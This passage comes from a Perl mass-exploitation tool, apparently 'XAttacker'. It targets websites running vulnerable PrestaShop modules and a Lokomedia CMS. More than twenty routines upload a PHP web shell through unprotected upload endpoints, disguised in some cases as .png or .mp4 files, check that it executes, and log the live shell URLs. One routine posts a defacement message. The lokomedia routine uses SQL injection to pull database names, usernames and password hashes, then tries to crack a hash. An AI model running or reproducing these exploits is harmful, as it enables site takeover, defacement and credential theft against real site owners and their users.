  1442. }
  1443. }
  1444.  
  1445. ################ vtermslideshow #####################
  1446. sub vtermslideshow(){
  1447. my $url = "$site/modules/vtermslideshow/uploadimage.php";
  1448. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [userfile => ["XAttacker.php"],]);
  1449.  
  1450. $vtermslideshowup="$site/modules/vtermslideshow/slides/XAttacker.php?X=Attacker";
  1451.  
  1452. my $checkvtermslideshow = $ua->get("$vtermslideshowup")->content;
  1453. if($checkvtermslideshow =~/X Attacker/) {
  1454.  
  1455. print item(),"Vtermslideshow";
  1456. print color('bold white')," .................... ";
  1457. print color('bold green'),"VULN\n";
  1458. print item(),"Shell Uploaded Successfully\n";
  1459. print color('bold white')," [Link] => $vtermslideshowup\n";
  1460. open (TEXT, '>>Result/Shells.txt');
  1461. print TEXT "$vtermslideshowup\n";
  1462. close (TEXT);
  1463. }else{
  1464. print item(),"Vtermslideshow";
  1465. print color('bold white')," .................... ";
  1466. print color('bold red'),"NOt VULN\n";
  1467. }
  1468. }
  1469.  
  1470. ################ simpleslideshow #####################
  1471. sub simpleslideshow(){
  1472. my $url = "$site/modules/simpleslideshow/uploadimage.php";
  1473. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [userfile => ["XAttacker.php"],]);
  1474.  
  1475. $simpleslideshowup="$site/modules/simpleslideshow/slides/XAttacker.php?X=Attacker";
  1476.  
  1477. my $checksimpleslideshow = $ua->get("$simpleslideshowup")->content;
  1478. if($checksimpleslideshow =~/X Attacker/) {
  1479.  
  1480. print item(),"simpleslideshow";
  1481. print color('bold white')," ................... ";
  1482. print color('bold green'),"VULN\n";
  1483. print item(),"Shell Uploaded Successfully\n";
  1484. print color('bold white')," [Link] => $simpleslideshowup\n";
  1485. open (TEXT, '>>Result/Shells.txt');
  1486. print TEXT "$simpleslideshowup\n";
  1487. close (TEXT);
  1488. }else{
  1489. print item(),"simpleslideshow";
  1490. print color('bold white')," ................... ";
  1491. print color('bold red'),"NOt VULN\n";
  1492. }
  1493. }
  1494.  
  1495. ################ blocktestimonial #####################
  1496. sub blocktestimonial(){
  1497. my $url = "$site/modules/blocktestimonial/addtestimonial.php";
  1498. my $response = $ua->post($url, testimonial_submitter_name => "XAttacker", testimonial_title => "HaCKeD BY Mohamed Riahi", testimonial_main_message => "HaCKeD BY Mohamed Riahi", testimonial_img => "XAttacker.php", testimonial => "Submit Testimonial");
  1499. $blocktestimonialup="$site/upload/XAttacker.php?X=Attacker";
  1500.  
  1501. my $checkblocktestimonial = $ua->get("$blocktestimonialup")->content;
  1502. if($checkblocktestimonial =~/X Attacker/) {
  1503.  
  1504. print item(),"blocktestimonial";
  1505. print color('bold white')," .................. ";
  1506. print color('bold green'),"VULN\n";
  1507. print item(),"Shell Uploaded Successfully\n";
  1508. print color('bold white')," [Link] => $blocktestimonialup\n";
  1509. open (TEXT, '>>Result/Shells.txt');
  1510. print TEXT "$blocktestimonialup\n";
  1511. close (TEXT);
  1512. }else{
  1513. print item(),"blocktestimonial";
  1514. print color('bold white')," .................. ";
  1515. print color('bold red'),"NOt VULN\n";
  1516. }
  1517. }
  1518.  
  1519. ################ productpageadverts #####################
  1520. sub productpageadverts(){
  1521. my $url = "$site/modules/productpageadverts/uploadimage.php";
  1522. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [userfile => ["XAttacker.php"],]);
  1523.  
  1524. $productpageadvertsup="$site/modules/productpageadverts/slides/XAttacker.php?X=Attacker";
  1525.  
  1526. my $checkproductpageadverts = $ua->get("$productpageadvertsup")->content;
  1527. if($checkproductpageadverts =~/X Attacker/) {
  1528.  
  1529. print item(),"productpageadverts";
  1530. print color('bold white')," ................ ";
  1531. print color('bold green'),"VULN\n";
  1532. print item(),"Shell Uploaded Successfully\n";
  1533. print color('bold white')," [Link] => $productpageadvertsup\n";
  1534. open (TEXT, '>>Result/Shells.txt');
  1535. print TEXT "$productpageadvertsup\n";
  1536. close (TEXT);
  1537. }else{
  1538. print item(),"productpageadverts";
  1539. print color('bold white')," ................ ";
  1540. print color('bold red'),"NOt VULN\n";
  1541. }
  1542. }
  1543.  
  1544. ################ homepageadvertise #####################
  1545. sub homepageadvertise(){
  1546. my $url = "$site/modules/homepageadvertise/uploadimage.php";
  1547. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [userfile => ["XAttacker.php"],]);
  1548.  
  1549. $homepageadvertiseup="$site/modules/homepageadvertise/slides/XAttacker.php?X=Attacker";
  1550.  
  1551. my $checkhomepageadvertise = $ua->get("$homepageadvertiseup")->content;
  1552. if($checkhomepageadvertise =~/X Attacker/) {
  1553.  
  1554. print item(),"homepageadvertise";
  1555. print color('bold white')," ................. ";
  1556. print color('bold green'),"VULN\n";
  1557. print item(),"Shell Uploaded Successfully\n";
  1558. print color('bold white')," [Link] => $homepageadvertiseup\n";
  1559. open (TEXT, '>>Result/Shells.txt');
  1560. print TEXT "$homepageadvertiseup\n";
  1561. close (TEXT);
  1562. }else{
  1563. print item(),"homepageadvertise";
  1564. print color('bold white')," ................. ";
  1565. print color('bold red'),"NOt VULN\n";
  1566. }
  1567. }
  1568.  
  1569. ################ homepageadvertise2 #####################
  1570. sub homepageadvertise2(){
  1571. my $url = "$site/modules/homepageadvertise2/uploadimage.php";
  1572. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [userfile => ["XAttacker.php"],]);
  1573.  
  1574. $homepageadvertise2up="$site/modules/homepageadvertise2/slides/XAttacker.php?X=Attacker";
  1575.  
  1576. my $checkhomepageadvertise2 = $ua->get("$homepageadvertise2up")->content;
  1577. if($checkhomepageadvertise2 =~/X Attacker/) {
  1578.  
  1579. print item(),"homepageadvertise2";
  1580. print color('bold white')," ................ ";
  1581. print color('bold green'),"VULN\n";
  1582. print item(),"Shell Uploaded Successfully\n";
  1583. print color('bold white')," [Link] => $homepageadvertise2up\n";
  1584. open (TEXT, '>>Result/Shells.txt');
  1585. print TEXT "$homepageadvertise2up\n";
  1586. close (TEXT);
  1587. }else{
  1588. print item(),"homepageadvertise2";
  1589. print color('bold white')," ................ ";
  1590. print color('bold red'),"NOt VULN\n";
  1591. }
  1592. }
  1593.  
  1594. ################ jro_homepageadvertise #####################
  1595. sub jro_homepageadvertise(){
  1596. my $url = "$site/modules/jro_homepageadvertise/uploadimage.php";
  1597. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [userfile => ["XAttacker.php"],]);
  1598.  
  1599. $jro_homepageadvertiseup="$site/modules/jro_homepageadvertise/slides/XAttacker.php?X=Attacker";
  1600.  
  1601. my $checkjro_homepageadvertise = $ua->get("$jro_homepageadvertiseup")->content;
  1602. if($checkjro_homepageadvertise =~/X Attacker/) {
  1603.  
  1604. print item(),"jro_homepageadvertise";
  1605. print color('bold white')," ............. ";
  1606. print color('bold green'),"VULN\n";
  1607. print item(),"Shell Uploaded Successfully\n";
  1608. print color('bold white')," [Link] => $jro_homepageadvertiseup\n";
  1609. open (TEXT, '>>Result/Shells.txt');
  1610. print TEXT "$jro_homepageadvertiseup\n";
  1611. close (TEXT);
  1612. }else{
  1613. print item(),"jro_homepageadvertise";
  1614. print color('bold white')," ............. ";
  1615. print color('bold red'),"NOt VULN\n";
  1616. }
  1617. }
  1618.  
  1619. ################ attributewizardpro #####################
  1620. sub attributewizardpro(){
  1621. my $url = "$site/modules/attributewizardpro/file_upload.php";
  1622. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [userfile => ["XAttacker.php"],]);
  1623.  
  1624. $attributewizardproup="$site/modules/attributewizardpro/file_uploads/XAttacker.php?X=Attacker";
  1625.  
  1626. my $checkattributewizardpro = $ua->get("$attributewizardproup")->content;
  1627. if($checkattributewizardpro =~/X Attacker/) {
  1628.  
  1629. print item(),"attributewizardpro";
  1630. print color('bold white')," ................ ";
  1631. print color('bold green'),"VULN\n";
  1632. print item(),"Shell Uploaded Successfully\n";
  1633. print color('bold white')," [Link] => $attributewizardproup\n";
  1634. open (TEXT, '>>Result/Shells.txt');
  1635. print TEXT "$attributewizardproup\n";
  1636. close (TEXT);
  1637. }else{
  1638. print item(),"attributewizardpro";
  1639. print color('bold white')," ................ ";
  1640. print color('bold red'),"NOt VULN\n";
  1641. }
  1642. }
  1643.  
  1644. ################ 1attributewizardpro #####################
  1645. sub oneattributewizardpro(){
  1646. my $url = "$site/modules/1attributewizardpro/file_upload.php";
  1647. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [userfile => ["XAttacker.php"],]);
  1648.  
  1649. $oneattributewizardproup="$site/modules/1attributewizardpro/file_uploads/XAttacker.php?X=Attacker";
  1650.  
  1651. my $checkoneattributewizardpro = $ua->get("$oneattributewizardproup")->content;
  1652. if($checkoneattributewizardpro =~/X Attacker/) {
  1653.  
  1654. print item(),"1attributewizardpro";
  1655. print color('bold white')," ............... ";
  1656. print color('bold green'),"VULN\n";
  1657. print item(),"Shell Uploaded Successfully\n";
  1658. print color('bold white')," [Link] => $oneattributewizardproup\n";
  1659. open (TEXT, '>>Result/Shells.txt');
  1660. print TEXT "$oneattributewizardproup\n";
  1661. close (TEXT);
  1662. }else{
  1663. print item(),"1attributewizardpro";
  1664. print color('bold white')," ............... ";
  1665. print color('bold red'),"NOt VULN\n";
  1666. }
  1667. }
  1668.  
  1669. ################ attributewizardpro.OLD #####################
  1670. sub attributewizardproOLD(){
  1671. my $url = "$site/modules/attributewizardpro.OLD/file_upload.php";
  1672. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [userfile => ["XAttacker.php"],]);
  1673.  
  1674. $attributewizardproOLDup="$site/modules/attributewizardpro.OLD/file_uploads/XAttacker.php?X=Attacker";
  1675.  
  1676. my $checkattributewizardproOLD = $ua->get("$attributewizardproOLDup")->content;
  1677. if($checkattributewizardproOLD =~/X Attacker/) {
  1678.  
  1679. print item(),"Attributewizardpro.OLD";
  1680. print color('bold white')," ............ ";
  1681. print color('bold green'),"VULN\n";
  1682. print item(),"Shell Uploaded Successfully\n";
  1683. print color('bold white')," [Link] => $attributewizardproOLDup\n";
  1684. open (TEXT, '>>Result/Shells.txt');
  1685. print TEXT "$attributewizardproOLDup\n";
  1686. close (TEXT);
  1687. }else{
  1688. print item(),"Attributewizardpro.OLD";
  1689. print color('bold white')," ............ ";
  1690. print color('bold red'),"NOt VULN\n";
  1691. }
  1692. }
  1693.  
  1694.  
  1695. ################ attributewizardpro_x #####################
  1696. sub attributewizardpro_x(){
  1697. my $url = "$site/modules/attributewizardpro_x/file_upload.php";
  1698. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [userfile => ["XAttacker.php"],]);
  1699.  
  1700. $attributewizardpro_xup="$site/modules/attributewizardpro_x/file_uploads/XAttacker.php?X=Attacker";
  1701.  
  1702. my $checkattributewizardpro_x = $ua->get("$attributewizardpro_xup")->content;
  1703. if($checkattributewizardpro_x =~/X Attacker/) {
  1704.  
  1705. print item(),"attributewizardpro_x";
  1706. print color('bold white')," .............. ";
  1707. print color('bold green'),"VULN\n";
  1708. print item(),"Shell Uploaded Successfully\n";
  1709. print color('bold white')," [Link] => $attributewizardpro_xup\n";
  1710. open (TEXT, '>>Result/Shells.txt');
  1711. print TEXT "$attributewizardpro_xup\n";
  1712. close (TEXT);
  1713. }else{
  1714. print item(),"attributewizardpro_x";
  1715. print color('bold white')," .............. ";
  1716. print color('bold red'),"NOt VULN\n";
  1717. }
  1718. }
  1719.  
  1720. ################ advancedslider #####################
  1721. sub advancedslider(){
  1722. my $url = "$site/modules/advancedslider/ajax_advancedsliderUpload.php?action=submitUploadImage%26id_slide=php";
  1723. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [qqfile => ["XAttacker.php.png"],]);
  1724.  
  1725. $advancedsliderup="$site/modules/advancedslider/uploads/XAttacker.php.png?X=Attacker";
  1726.  
  1727. my $checkadvancedslider = $ua->get("$advancedsliderup")->content;
  1728. if($checkadvancedslider =~/X Attacker/) {
  1729.  
  1730. print item(),"advancedslider";
  1731. print color('bold white')," .................... ";
  1732. print color('bold green'),"VULN\n";
  1733. print item(),"Shell Uploaded Successfully\n";
  1734. print color('bold white')," [Link] => $advancedsliderup\n";
  1735. open (TEXT, '>>Result/Shells.txt');
  1736. print TEXT "$advancedsliderup\n";
  1737. close (TEXT);
  1738. }else{
  1739. print item(),"advancedslider";
  1740. print color('bold white')," .................... ";
  1741. print color('bold red'),"NOt VULN\n";
  1742. }
  1743. }
  1744.  
  1745. ################ cartabandonmentpro #####################
  1746. sub cartabandonmentpro(){
  1747. my $url = "$site/modules/cartabandonmentpro/upload.php";
  1748. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [image => ["XAttacker.php.png"],]);
  1749.  
  1750. $cartabandonmentproup="$site/modules/cartabandonmentpro/uploads/XAttacker.php.png?X=Attacker";
  1751.  
  1752. my $checkcartabandonmentpro = $ua->get("$cartabandonmentproup")->content;
  1753. if($checkcartabandonmentpro =~/X Attacker/) {
  1754.  
  1755. print item(),"cartabandonmentpro";
  1756. print color('bold white')," ................ ";
  1757. print color('bold green'),"VULN\n";
  1758. print item(),"Shell Uploaded Successfully\n";
  1759. print color('bold white')," [Link] => $cartabandonmentproup\n";
  1760. open (TEXT, '>>Result/Shells.txt');
  1761. print TEXT "$cartabandonmentproup\n";
  1762. close (TEXT);
  1763. }else{
  1764. print item(),"cartabandonmentpro";
  1765. print color('bold white')," ................ ";
  1766. print color('bold red'),"NOt VULN\n";
  1767. }
  1768. }
  1769.  
  1770. ################ cartabandonmentproOld #####################
  1771. sub cartabandonmentproOld(){
  1772. my $url = "$site/modules/cartabandonmentproOld/upload.php";
  1773. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [image => ["XAttacker.php.png"],]);
  1774.  
  1775. $cartabandonmentproOldup="$site/modules/cartabandonmentproOld/uploads/XAttacker.php.png?X=Attacker";
  1776.  
  1777. my $checkcartabandonmentproOld = $ua->get("$cartabandonmentproOldup")->content;
  1778. if($checkcartabandonmentproOld =~/X Attacker/) {
  1779.  
  1780. print item(),"cartabandonmentproOld";
  1781. print color('bold white')," ............. ";
  1782. print color('bold green'),"VULN\n";
  1783. print item(),"Shell Uploaded Successfully\n";
  1784. print color('bold white')," [Link] => $cartabandonmentproOldup\n";
  1785. open (TEXT, '>>Result/Shells.txt');
  1786. print TEXT "$cartabandonmentproOldup\n";
  1787. close (TEXT);
  1788. }else{
  1789. print item(),"cartabandonmentproOld";
  1790. print color('bold white')," ............. ";
  1791. print color('bold red'),"NOt VULN\n";
  1792. }
  1793. }
  1794.  
  1795. ################ videostab #####################
  1796. sub videostab(){
  1797. my $url = "$site/modules/videostab/ajax_videostab.php?action=submitUploadVideo%26id_product=upload";
  1798. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [qqfile => ["XAttacker.php.mp4"],]);
  1799.  
  1800. $videostabup="$site/modules/videostab/uploads/XAttacker.php.mp4?X=Attacker";
  1801.  
  1802. my $checkvideostab = $ua->get("$videostabup")->content;
  1803. if($checkvideostab =~/X Attacker/) {
  1804.  
  1805. print item(),"videostab";
  1806. print color('bold white')," ......................... ";
  1807. print color('bold green'),"VULN\n";
  1808. print item(),"Shell Uploaded Successfully\n";
  1809. print color('bold white')," [Link] => $videostabup\n";
  1810. open (TEXT, '>>Result/Shells.txt');
  1811. print TEXT "$videostabup\n";
  1812. close (TEXT);
  1813. }else{
  1814. print item(),"videostab";
  1815. print color('bold white')," ......................... ";
  1816. print color('bold red'),"NOt VULN\n";
  1817. }
  1818. }
  1819.  
  1820. ################ wg24themeadministration #####################
  1821. sub wg24themeadministration(){
  1822. my $url = "$site/modules//wg24themeadministration/wg24_ajax.php";
  1823. my $response = $ua->post($url, Content_Type => 'multipart/form-data', data => 'bajatax', type => 'pattern_upload', Content => [bajatax => ["XAttacker.php"],]);
  1824.  
  1825. $wg24themeadministrationup="$site/modules//wg24themeadministration///img/upload/XAttacker.php?X=Attacker";
  1826.  
  1827. my $checkwg24themeadministration = $ua->get("$wg24themeadministrationup")->content;
  1828. if($checkwg24themeadministration =~/X Attacker/) {
  1829.  
  1830. print item(),"wg24themeadministration";
  1831. print color('bold white')," ........... ";
  1832. print color('bold green'),"VULN\n";
  1833. print item(),"Shell Uploaded Successfully\n";
  1834. print color('bold white')," [Link] => $wg24themeadministrationup\n";
  1835. open (TEXT, '>>Result/Shells.txt');
  1836. print TEXT "$wg24themeadministrationup\n";
  1837. close (TEXT);
  1838. }else{
  1839. print item(),"wg24themeadministration";
  1840. print color('bold white')," ........... ";
  1841. print color('bold red'),"NOt VULN\n";
  1842. }
  1843. }
  1844.  
  1845. ################ fieldvmegamenu #####################
  1846. sub fieldvmegamenu(){
  1847. my $url = "$site/modules/fieldvmegamenu/ajax/upload.php";
  1848. my $shell ="XAttacker.php";
  1849. my $field_name = "images[]";
  1850.  
  1851. my $response = $ua->post( $url,
  1852. Content_Type => 'multipart/form-data',
  1853. Content => [ $field_name => ["$shell"] ]
  1854.  
  1855. );
  1856. $fieldvmegamenuup="$site/modules/fieldvmegamenu/uploads/XAttacker.php?X=Attacker";
  1857.  
  1858. my $checkfieldvmegamenu = $ua->get("$fieldvmegamenuup")->content;
  1859. if($checkfieldvmegamenu =~/X Attacker/) {
  1860.  
  1861. print item(),"fieldvmegamenu";
  1862. print color('bold white')," .................... ";
  1863. print color('bold green'),"VULN\n";
  1864. print item(),"Shell Uploaded Successfully\n";
  1865. print color('bold white')," [Link] => $fieldvmegamenuup\n";
  1866. open (TEXT, '>>Result/Shells.txt');
  1867. print TEXT "$fieldvmegamenuup\n";
  1868. close (TEXT);
  1869. }else{
  1870. print item(),"fieldvmegamenu";
  1871. print color('bold white')," .................... ";
  1872. print color('bold red'),"NOt VULN\n";
  1873. }
  1874. }
  1875.  
  1876.  
  1877. ################ wdoptionpanel #####################
  1878. sub wdoptionpanel(){
  1879. my $url = "$site/modules/wdoptionpanel/wdoptionpanel_ajax.php";
  1880. my $response = $ua->post($url, Content_Type => 'multipart/form-data', data => 'bajatax', type => 'image_upload', Content => [bajatax => ["XAttacker.php"],]);
  1881.  
  1882. $wdoptionpanelup="$site/modules/wdoptionpanel/upload/XAttacker.php?X=Attacker";
  1883.  
  1884. my $checkwdoptionpanel = $ua->get("$wdoptionpanelup")->content;
  1885. if($checkwdoptionpanel =~/X Attacker/) {
  1886.  
  1887. print item(),"wdoptionpanel";
  1888. print color('bold white')," ..................... ";
  1889. print color('bold green'),"VULN\n";
  1890. print item(),"Shell Uploaded Successfully\n";
  1891. print color('bold white')," [Link] => $wdoptionpanelup\n";
  1892. open (TEXT, '>>Result/Shells.txt');
  1893. print TEXT "$wdoptionpanelup\n";
  1894. close (TEXT);
  1895. }else{
  1896. print item(),"wdoptionpanel";
  1897. print color('bold white')," ..................... ";
  1898. print color('bold red'),"NOt VULN\n";
  1899. }
  1900. }
  1901.  
  1902.  
  1903. ################ pk_flexmenu #####################
  1904. sub pk_flexmenu(){
  1905. my $url = "$site/modules/pk_flexmenu/ajax/upload.php";
  1906. my $shell ="XAttacker.php";
  1907. my $field_name = "images[]";
  1908.  
  1909. my $response = $ua->post( $url,
  1910. Content_Type => 'multipart/form-data',
  1911. Content => [ $field_name => ["$shell"] ]
  1912.  
  1913. );
  1914. $pk_flexmenuup="$site/modules/pk_flexmenu/uploads/XAttacker.php?X=Attacker";
  1915.  
  1916. my $checkpk_flexmenu = $ua->get("$pk_flexmenuup")->content;
  1917. if($checkpk_flexmenu =~/X Attacker/) {
  1918.  
  1919. print item(),"pk_flexmenu";
  1920. print color('bold white')," ....................... ";
  1921. print color('bold green'),"VULN\n";
  1922. print item(),"Shell Uploaded Successfully\n";
  1923. print color('bold white')," [Link] => $pk_flexmenuup\n";
  1924. open (TEXT, '>>Result/Shells.txt');
  1925. print TEXT "$pk_flexmenuup\n";
  1926. close (TEXT);
  1927. }else{
  1928. print item(),"pk_flexmenu";
  1929. print color('bold white')," ....................... ";
  1930. print color('bold red'),"NOt VULN\n";
  1931. }
  1932. }
  1933.  
  1934. ################ pk_vertflexmenu #####################
  1935. sub pk_vertflexmenu(){
  1936. my $url = "$site/modules/pk_vertflexmenu/ajax/upload.php";
  1937. my $shell ="XAttacker.php";
  1938. my $field_name = "images[]";
  1939.  
  1940. my $response = $ua->post( $url,
  1941. Content_Type => 'multipart/form-data',
  1942. Content => [ $field_name => ["$shell"] ]
  1943.  
  1944. );
  1945. $pk_vertflexmenuup="$site/modules/pk_vertflexmenu/uploads/XAttacker.php?X=Attacker";
  1946.  
  1947. my $checkpk_vertflexmenu = $ua->get("$pk_vertflexmenuup")->content;
  1948. if($checkpk_vertflexmenu =~/X Attacker/) {
  1949.  
  1950. print item(),"pk_vertflexmenu";
  1951. print color('bold white')," ................... ";
  1952. print color('bold green'),"VULN\n";
  1953. print item(),"Shell Uploaded Successfully\n";
  1954. print color('bold white')," [Link] => $pk_vertflexmenuup\n";
  1955.  
  1956. open (TEXT, '>>Result/Shells.txt');
  1957. print TEXT "$pk_vertflexmenuup\n";
  1958. close (TEXT);
  1959. }else{
  1960. print item(),"pk_vertflexmenu";
  1961. print color('bold white')," ................... ";
  1962. print color('bold red'),"NOt VULN\n";
  1963. }
  1964. }
  1965.  
  1966. ################ nvn_export_orders #####################
  1967. sub nvn_export_orders(){
  1968. my $url = "$site/modules/nvn_export_orders/upload.php";
  1969. my $shell ="nvn_extra_add.php";
  1970. my $field_name = "images[]";
  1971.  
  1972. my $response = $ua->post( $url,
  1973. Content_Type => 'multipart/form-data',
  1974. Content => [ $field_name => ["$shell"] ]
  1975.  
  1976. );
  1977. $nvn_export_ordersup="$site/modules/nvn_export_orders/nvn_extra_add.php?X=Attacker";
  1978.  
  1979. my $checknvn_export_orders = $ua->get("$nvn_export_ordersup")->content;
  1980. if($checknvn_export_orders =~/X Attacker/) {
  1981.  
  1982. print item(),"nvn_export_orders";
  1983. print color('bold white')," ................. ";
  1984. print color('bold green'),"VULN\n";
  1985. print item(),"Shell Uploaded Successfully\n";
  1986. print color('bold white')," [Link] => $nvn_export_ordersup\n";
  1987. open (TEXT, '>>Result/Shells.txt');
  1988. print TEXT "$nvn_export_ordersup\n";
  1989. close (TEXT);
  1990. }else{
  1991. print item(),"nvn_export_orders";
  1992. print color('bold white')," ................. ";
  1993. print color('bold red'),"NOt VULN\n";
  1994. }
  1995. }
  1996.  
  1997. ################ megamenu #####################
  1998. sub megamenu(){
  1999. my $url = "$site/modules/megamenu/uploadify/uploadify.php?id=XAttacker.php";
  2000. my $shell ="XAttacker.php.png";
  2001. my $field_name = "Filedata";
  2002.  
  2003. my $response = $ua->post( $url,
  2004. Content_Type => 'multipart/form-data',
  2005. Content => [ $field_name => ["$shell"] ]
  2006.  
  2007. );
  2008. $megamenuup="$site/XAttacker.php.png?X=Attacker";
  2009.  
  2010. my $checkmegamenu = $ua->get("$megamenuup")->content;
  2011. if($checkmegamenu =~/X Attacker/) {
  2012.  
  2013. print item(),"megamenu";
  2014. print color('bold white')," .......................... ";
  2015. print color('bold green'),"VULN\n";
  2016. print item(),"Shell Uploaded Successfully\n";
  2017. print color('bold white')," [Link] => $megamenuup\n";
  2018. open (TEXT, '>>Result/Shells.txt');
  2019. print TEXT "$megamenuup\n";
  2020. close (TEXT);
  2021. }else{
  2022. print item(),"megamenu";
  2023. print color('bold white')," .......................... ";
  2024. print color('bold red'),"NOt VULN\n";
  2025. }
  2026. }
  2027.  
  2028. ################ tdpsthemeoptionpanel #####################
  2029. sub tdpsthemeoptionpanel(){
  2030. my $url = "$site/modules/tdpsthemeoptionpanel/tdpsthemeoptionpanelAjax.php";
  2031. my $shell ="XAttacker.php";
  2032. my $field_name = "image_upload";
  2033.  
  2034. my $response = $ua->post( $url,
  2035. Content_Type => 'multipart/form-data',
  2036. data => 'bajatax',
  2037. Content => [ $field_name => ["$shell"] ]
  2038.  
  2039. );
  2040. $tdpsthemeoptionpanelup="$site/modules/tdpsthemeoptionpanel/upload/XAttacker.php?X=Attacker";
  2041.  
  2042. my $checktdpsthemeoptionpanel = $ua->get("$tdpsthemeoptionpanelup")->content;
  2043. if($checktdpsthemeoptionpanel =~/X Attacker/) {
  2044.  
  2045. print item(),"tdpsthemeoptionpanel";
  2046. print color('bold white')," .............. ";
  2047. print color('bold green'),"VULN\n";
  2048. print item(),"Shell Uploaded Successfully\n";
  2049. print color('bold white')," [Link] => $tdpsthemeoptionpanelup\n";
  2050. open (TEXT, '>>Result/Shells.txt');
  2051. print TEXT "$tdpsthemeoptionpanelup\n";
  2052. close (TEXT);
  2053. }else{
  2054. print item(),"tdpsthemeoptionpanel";
  2055. print color('bold white')," .............. ";
  2056. print color('bold red'),"NOt VULN\n";
  2057. }
  2058. }
  2059.  
  2060.  
  2061. ################ psmodthemeoptionpanel #####################
  2062. sub psmodthemeoptionpanel(){
  2063. my $url = "$site/modules/psmodthemeoptionpanel/psmodthemeoptionpanel_ajax.php";
  2064. my $shell ="XAttacker.php";
  2065. my $field_name = "image_upload";
  2066.  
  2067. my $response = $ua->post( $url,
  2068. Content_Type => 'multipart/form-data',
  2069. data => 'bajatax',
  2070. Content => [ $field_name => ["$shell"] ]
  2071.  
  2072. );
  2073. $psmodthemeoptionpanelup="$site/modules/psmodthemeoptionpanel/upload/XAttacker.php?X=Attacker";
  2074.  
  2075. my $checkpsmodthemeoptionpanel = $ua->get("$psmodthemeoptionpanelup")->content;
  2076. if($checkpsmodthemeoptionpanel =~/X Attacker/) {
  2077.  
  2078. print item(),"psmodthemeoptionpanel";
  2079. print color('bold white')," ............. ";
  2080. print color('bold green'),"VULN\n";
  2081. print item(),"Shell Uploaded Successfully\n";
  2082. print color('bold white')," [Link] => $psmodthemeoptionpanelup\n";
  2083. open (TEXT, '>>Result/Shells.txt');
  2084. print TEXT "$psmodthemeoptionpanelup\n";
  2085. close (TEXT);
  2086. }else{
  2087. print item(),"psmodthemeoptionpanel";
  2088. print color('bold white')," ............. ";
  2089. print color('bold red'),"NOt VULN\n";
  2090. }
  2091. }
  2092.  
  2093.  
  2094. ################ masseditproduct #####################
  2095. sub masseditproduct(){
  2096. my $url = "$site/modules/lib/redactor/file_upload.php";
  2097. my $shell ="XAttacker.php";
  2098. my $field_name = "file";
  2099.  
  2100. my $response = $ua->post( $url,
  2101. Content_Type => 'multipart/form-data',
  2102. Content => [ $field_name => ["$shell"] ]
  2103.  
  2104. );
  2105. $masseditproductup="$site/masseditproduct/uploads/file/XAttacker.php?X=Attacker";
  2106.  
  2107. my $checkmasseditproduct = $ua->get("$masseditproductup")->content;
  2108. if($checkmasseditproduct =~/X Attacker/) {
  2109.  
  2110. print item(),"masseditproduct";
  2111. print color('bold white')," ................... ";
  2112. print color('bold green'),"VULN\n";
  2113. print item(),"Shell Uploaded Successfully\n";
  2114. print color('bold white')," [Link] => $masseditproductup\n\n";
  2115. open (TEXT, '>>Result/Shells.txt');
  2116. print TEXT "$masseditproductup\n";
  2117. close (TEXT);
  2118. }else{
  2119. print item(),"masseditproduct";
  2120. print color('bold white')," ................... ";
  2121. print color('bold red'),"NOt VULN\n\n";
  2122. }
  2123. }
  2124.  
  2125.  
  2126. ################ lokomedia #####################
  2127. sub lokomedia(){
  2128. $lokoversion = "$site/statis--7'union select /*!50000Concat*/(Version())+from+users--+--+kantordesa.html";
  2129. $lokodatabase = "$site/statis--7'union select /*!50000Concat*/(Database())+from+users--+--+kantordesa.html";
  2130. $lokouserdata = "$site/statis--7'union select /*!50000Concat*/(USER())+from+users--+--+kantordesa.html";
  2131. $lokouser = "$site/statis--7'union select /*!50000Concat*/(username)+from+users--+--+kantordesa.html";
  2132. $lokopass = "$site/statis--7'union select /*!50000Concat*/(password)+from+users--+--+kantordesa.html";
  2133.  
  2134. my $checklokoversion = $ua->get("$lokoversion")->content;
  2135. if($checklokoversion =~/<meta name="description" content="(.*)">/) {
  2136. $dbv=$1;
  2137.  
  2138. if($dbv =~ /[a-z]/){
  2139. print item()," MySQL Version : $dbv\n";
  2140. open (TEXT, '>>Result/databases.txt');
  2141. print TEXT "\n[ DATABASE ]\n";
  2142. print TEXT "$site";
  2143. print TEXT "\nMySQL Version : $dbv";
  2144. close (TEXT);
  2145. my $checklokodatabase = $ua->get("$lokodatabase")->content;
  2146. if($checklokodatabase =~/<meta name="description" content="(.*)">/) {
  2147. $db=$1;
  2148. print item()," Current Database : $db\n";
  2149. open (TEXT, '>>Result/databases.txt');
  2150. print TEXT "\nCurrent Database : $db";
  2151. close (TEXT);
  2152. }
  2153. my $checklokouserdata = $ua->get("$lokouserdata")->content;
  2154. if($checklokouserdata =~/<meta name="description" content="(.*)">/) {
  2155. $udb=$1;
  2156. print item()," Current Username : $udb\n";
  2157. }
  2158. my $checklokouser = $ua->get("$lokouser")->content;
  2159. if($checklokouser =~/<meta name="description" content="(.*)">/) {
  2160. $user=$1;
  2161. print item()," Username : $user\n";
  2162. open (TEXT, '>>Result/databases.txt');
  2163. print TEXT "\nUsername : $user";
  2164. close (TEXT);
  2165. }
  2166. my $checklokopass = $ua->get("$lokopass")->content;
  2167. if($checklokopass =~/<meta name="description" content="(.*)">/) {
  2168. $hash=$1;
  2169. print item()," Hash Pass : $hash\n";
  2170. open (TEXT, '>>Result/databases.txt');
  2171. print TEXT "\nHash Pass : $hash";
  2172. close (TEXT);
  2173. lokohash();
  2174. lokopanel();
  2175. }
  2176. }
  2177. }
  2178. }
  2179. sub lokohash(){
  2180. if ($hash =~ /a66abb5684c45962d887564f08346e8d/){
  2181. print item(),"Cracking Hash : ";
  2182. print color('bold green'),"Found!";
  2183. print color('bold green')," [";
  2184. print color('bold red'),"+";
  2185. print color('bold green'),"] ";
  2186. print color('bold white'),"Password : admin123456\n";
  2187. open (TEXT, '>>Result/databases.txt');
